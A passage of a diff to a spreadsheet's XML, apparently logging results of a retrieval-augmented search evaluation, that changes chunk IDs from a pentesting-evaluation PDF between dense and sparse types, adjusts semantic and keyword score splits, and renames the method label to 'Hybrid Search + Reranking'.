-preemware_pentestingeval.pdf (Chunk: 06be473b-cc96-4ad1-ac04-9db37c7e9f88, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: e189877f-2ed8-49a5-ae4b-00bb7694f847, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I219" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 5, Total: 10</t>
         </is>
       </c>
       <c r="J219" t="n">
@@ -15190,7 +15168,7 @@
       </c>
       <c r="K219" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -15251,12 +15229,12 @@
 preemware_pentestingeval.pdf (Chunk: d9939fbc-1cef-4606-95f6-da7f4a8cb6cf, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I220" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J220" t="n">
@@ -15264,7 +15242,7 @@
       </c>
       <c r="K220" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -15309,21 +15287,21 @@
       </c>
       <c r="H221" t="inlineStr">
         <is>
-          <t>preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 1)
+          <t>preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 8f2cb960-4b58-411c-9fc2-893b0101d44a, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I221" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J221" t="n">
@@ -15331,7 +15309,7 @@
       </c>
       <c r="K221" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -15378,19 +15356,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 94a5825c-3c24-4426-98b6-0f15dd480b28, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 7f4cba70-0971-4a0a-8dd8-1a86821cdef1, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 60ebd270-998c-47f2-98a3-628070e318cb, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 60ebd270-998c-47f2-98a3-628070e318cb, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 8f2cb960-4b58-411c-9fc2-893b0101d44a, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I222" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J222" t="n">
@@ -15398,7 +15376,7 @@
       </c>
       <c r="K222" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -15448,16 +15426,16 @@
 preemware_pentestingeval.pdf (Chunk: ca5d3a49-3c09-4a73-8dbf-43188a8e0fdf, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 28d10b6c-0649-4116-81ed-72fe66e40d18, Type: dense, Rank: 4)
 cowWhySo-pentest-redteam-steering.md (Chunk: d29fee93-c440-4931-9641-da6248fd3fe0, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I223" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J223" t="n">
@@ -15465,7 +15443,7 @@
       </c>
       <c r="K223" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -15519,11 +15497,11 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 696c12ad-676b-479b-a2f2-cde8fd35dbfa, Type: dense, Rank: 10)</t>
@@ -15531,7 +15509,7 @@
       </c>
       <c r="I224" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J224" t="n">
@@ -15539,7 +15517,7 @@
       </c>
       <c r="K224" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -15585,11 +15563,11 @@
       <c r="H225" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 86786a50-15b5-4c14-be3b-c67e3d167f6c, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 863931e2-a680-4ee8-846b-f4053787bdc1, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 446c016e-ab1a-45cc-bba8-04d6c3f76454, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 866bc2f2-6f4f-4d94-9bf5-c5a8241abd5e, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: dense, Rank: 9)
@@ -15598,7 +15576,7 @@
       </c>
       <c r="I225" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J225" t="n">
@@ -15606,7 +15584,7 @@
       </c>
       <c r="K225" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -15654,18 +15632,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: 1a5e8f08-fd90-4c25-a779-87ec681598e1, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 2e5f6c3f-5d6d-4105-a3ca-8d4f6eef701d, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 37a1279b-9bd8-4772-84d8-32116433dad3, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: sparse, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 37a1279b-9bd8-4772-84d8-32116433dad3, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: c0ed16e1-fecd-4bdf-8424-414dcf8f986a, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 093ba00d-947f-4916-ad84-551758243b8e, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I226" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J226" t="n">
@@ -15673,7 +15651,7 @@
       </c>
       <c r="K226" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -15725,14 +15703,14 @@
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 863931e2-a680-4ee8-846b-f4053787bdc1, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 2bcd487a-ccce-43e5-ac47-528e0428474b, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: d106a4a8-f9f3-4c71-a034-d800334dd5a3, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: d106a4a8-f9f3-4c71-a034-d800334dd5a3, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: d8c4c51e-7616-430d-9196-7af2b1f35cb2, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I227" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J227" t="n">
@@ -15740,7 +15718,7 @@
       </c>
       <c r="K227" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -15791,15 +15769,15 @@
 preemware_pentestingeval.pdf (Chunk: 00dd62ed-7dfa-4bd3-ad8f-e2b1cba9ce52, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 36e54dab-ab32-4509-abd8-e70613c1ce77, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d8c4c51e-7616-430d-9196-7af2b1f35cb2, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 36e54dab-ab32-4509-abd8-e70613c1ce77, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: d8c4c51e-7616-430d-9196-7af2b1f35cb2, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: dense, Rank: 9)
 cowWhySo-pentest-redteam-steering.md (Chunk: 0f10f6d3-5dcc-4aad-bb64-5a4e62ffeeac, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I228" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J228" t="n">
@@ -15807,7 +15785,7 @@
       </c>
       <c r="K228" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -15858,15 +15836,15 @@
 preemware_pentestingeval.pdf (Chunk: 00dd62ed-7dfa-4bd3-ad8f-e2b1cba9ce52, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 86786a50-15b5-4c14-be3b-c67e3d167f6c, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: d6ee2010-4521-4fdb-bc8d-5103053d4db5, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 866bc2f2-6f4f-4d94-9bf5-c5a8241abd5e, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: d6ee2010-4521-4fdb-bc8d-5103053d4db5, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 866bc2f2-6f4f-4d94-9bf5-c5a8241abd5e, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I229" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J229" t="n">
@@ -15874,7 +15852,7 @@
       </c>
       <c r="K229" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -15928,12 +15906,12 @@
 preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 8f2cb960-4b58-411c-9fc2-893b0101d44a, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I230" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J230" t="n">
@@ -15941,7 +15919,7 @@
       </c>
       <c r="K230" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -15994,13 +15972,13 @@
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 6fe9074d-23ef-4574-890d-8b4b12031dc1, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 6fe9074d-23ef-4574-890d-8b4b12031dc1, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I231" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J231" t="n">
@@ -16008,7 +15986,7 @@
       </c>
       <c r="K231" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -16059,18 +16037,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: 9fe1814c-7278-41e5-a85b-bfc64122651b, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: c96b626d-950f-48a3-878e-fd81cae36046, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 5bcad625-27ff-4c5d-acb6-97686598c38f, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: ed71a0e0-bbee-4624-8615-8f7108af7d8d, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 75597556-2c3f-4be1-9936-b0a9d82dd4df, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 2c838caf-4fdc-47c9-ac53-31220f3a2f97, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 0da02c07-0fe5-48ee-af2c-3db15d61708f, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 0da02c07-0fe5-48ee-af2c-3db15d61708f, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I232" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J232" t="n">
@@ -16078,7 +16056,7 @@
       </c>
       <c r="K232" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -16124,20 +16102,20 @@
       <c r="H233" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 6a3bf430-df4e-48ec-a031-aa60204cb560, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 69250b66-f38a-4bf6-9f09-e3c676c2c002, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 99c75208-0347-4943-851b-17857ce42681, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 99c75208-0347-4943-851b-17857ce42681, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I233" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J233" t="n">
@@ -16145,7 +16123,7 @@
       </c>
       <c r="K233" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -16194,17 +16172,17 @@
 preemware_pentestingeval.pdf (Chunk: ab64f5ee-2cb7-453d-97a6-cf3df8ab2636, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e79289ff-16f2-4a3d-9cf9-a3a92e8bbfd6, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 1bf7372e-dcae-42ee-a9d9-0b1222053518, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I234" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J234" t="n">
@@ -16212,7 +16190,7 @@
       </c>
       <c r="K234" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -16263,15 +16241,15 @@
 preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: c8091472-5f13-4fd4-b42f-775d8b5720af, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c54f468f-1388-41a7-b8ef-35e5cc3eac90, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: c54f468f-1388-41a7-b8ef-35e5cc3eac90, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c66b81fc-63d9-4a97-b0ee-e81484cd308f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c66b81fc-63d9-4a97-b0ee-e81484cd308f, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I235" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J235" t="n">
@@ -16279,7 +16257,7 @@
       </c>
       <c r="K235" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -16326,19 +16304,19 @@
         <is>
